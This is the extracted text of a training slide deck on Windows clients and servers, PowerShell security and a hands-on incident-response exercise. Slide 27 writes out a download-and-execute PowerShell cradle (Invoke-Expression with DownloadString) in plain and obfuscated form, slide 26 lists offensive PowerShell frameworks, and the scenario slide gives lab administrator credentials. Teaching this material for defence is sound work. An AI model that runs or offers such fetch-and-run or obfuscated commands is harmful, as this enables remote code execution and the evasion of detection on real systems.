summary
play

SUMMARY History End of life CLI Services Security Considerations - PowerPoint PPT Presentation

SUMMARY History End of life CLI Services Security Considerations PowerShell Incident Response BRIEF HISTORY (WINDOWS CLIENT) MSDOS (1980) WINDOWS (1985) WINDOWS 3.1 (1992) Windows 95 (1995)


  1. SUMMARY ▶ History ▶ End of life ▶ CLI ▶ Services ▶ Security Considerations ▶ PowerShell ▶ Incident Response

  2. BRIEF HISTORY (WINDOWS CLIENT) MSDOS (1980) ▶ WINDOWS (1985) ▶ WINDOWS 3.1 (1992) ▶ Windows 95 (1995) ▶ Windows ME (2000) ▶ Windows XP (2001) ▶ Windows Vista (2006) ▶ Windows 7 (2009) ▶ Windows 8 (2012) ▶ Windows 10 (2015) ▶

  3. BRIEF HISTORY (WINDOWS SERVER) ▶ Windows NT (1993) ▶ Windows NT 4.0 (1996) ▶ Windows Server 2003 ▶ Windows Server 2008 ▶ Server 2012 ▶ Server 2016 ▶ Server 2019 (2018)

  4. MARKET SHARE

  5. END OF LIFE ▶ Windows 7 (2020) ▶ Windows 8.1 (2023)

  6. END OF LIFE

  7. KERNEL TYPES

  8. KERNEL

  9. COMMAND LINE INTERFACE (CLI)

  10. COMMAND LINE INTERFACE (CLI)

  11. SERVICES *Fixes 99% of printer problems

  12. WINDOWS SERVER

  13. SERVER CORE

  14. ACTIVE DIRECTORY (AD)

  15. ACTIVE DIRECTORY (AD)

  16. DOMAIN NAME SERVICE (DNS)

  17. DYNAMIC HOST CONFIGURATION PROTOCOL(DHCP)

  18. FILE TRANSFER PROTOCOL (FTP)

  19. INTERNET INFORMATION SERVICES (IIS)

  20. SERVER MESSAGE BLOCK (SMB)

  21. DOMAIN NAME SERVICE (DNS)

  22. GROUP POLICY OBJECTS (GPO)

  23. SECURITY CONSIDERATIONS

  24. WINDOWS DEFENDER ▶ Built into Windows ▶ Behavior based/Signature based

  25. WINDOWS DEFENDER

  26. POWERSHELL BASED EXPLOITATION ▶ “Living off the land” ▶ Open Source Tools Bloodhound ▶ Empire (BC-Security Branch) ▶ Powerup ▶ PoshC2 ▶ Death Star ▶ https://github.com/PowerShellMafia ▶ And more… ▶

  27. OBFUSCATION AND POWERSHELL ▶ -nop == -nopr == -noprof == -noprofile ▶ Invoke-Expression (New-Object Net.WebClient).DownloadString(“htt” + “ps://” + “bit.ly/sample”) == ▶ `I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*) “`N`e`T`.`W`e`B`C`l`i`e`N`T”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”( ‘ht’+’tps://bit.ly/sample’)

  28. POWERSHELL EXECUTION POLICIES ▶ Not intended to be a security feature

  29. POWERSHELL LOGGING ▶ Only possible in V5 ▶ Very powerful

  30. TOPPLING THE EMPIRE

  31. WHEN SIGNATURE DETECTION FAILS

  32. BEHAVIOR DETECTION SUCCEEDS

  33. WINDOWS DEFENDER + GROUP POLICIES

  34. WINDOWS DEFENDER + GROUP POLICIES

  35. POWERSHELL COMMANDS ▶ Get-Service Lists services running or stopped ▶

  36. POWERSHELL COMMANDS ▶ Start-Service <servicename> ▶ Stop-Service <servicename> Start/Stop service ▶ Ex. Start-Service DNS ▶

  37. POWERSHELL COMMANDS ▶ sc.exe start <servicename> ▶ sc.exe stop <servicename> Start/Stop service ▶

  38. POWERSHELL COMMANDS ▶ Set-Service –Name <serviceName> -StartupType <startupType> Automatic (Delayed) ▶ Automatic ▶ Manual ▶ Disabled ▶

  39. POWERSHELL COMMANDS ▶ Get-MpComputerStatus Gets the status of antimalware software on system ▶

  40. POWERSHELL COMMANDS ▶ Get-Process List Processes ▶

  41. POWERSHELL COMMANDS ▶ Clear Clear Screen ▶

  42. POWERSHELL COMMANDS ▶ More info https://docs.microsoft.com/en-us/powershell/

  43. INCIDENT RESPONSE Hands on

  44. SCENARIO Device: 1x breached Active Directory Server ▶ Brute force attack detected by intrusion detection system at 9/9/2020 at ▶ 0900 EST Defender scan ran following attack no malicious programs found ▶ Credentials ▶ Username: NIMITZ\Administrator ▶ Password: Change.me! ▶

  45. RELEVANT EVENT LOGS

  46. EVENT LOG

  47. EVENT LOG

  48. EVENT LOG

  49. EVENT LOG

  50. EVENT LOG

  51. EVENT LOG

  52. RELEVANT POWERSHELL LOGS

  53. POWERSHELL LOGS

  54. POWERSHELL LOGS

  55. POWERSHELL LOGS

  56. POWERSHELL LOGS

Recommend


More recommend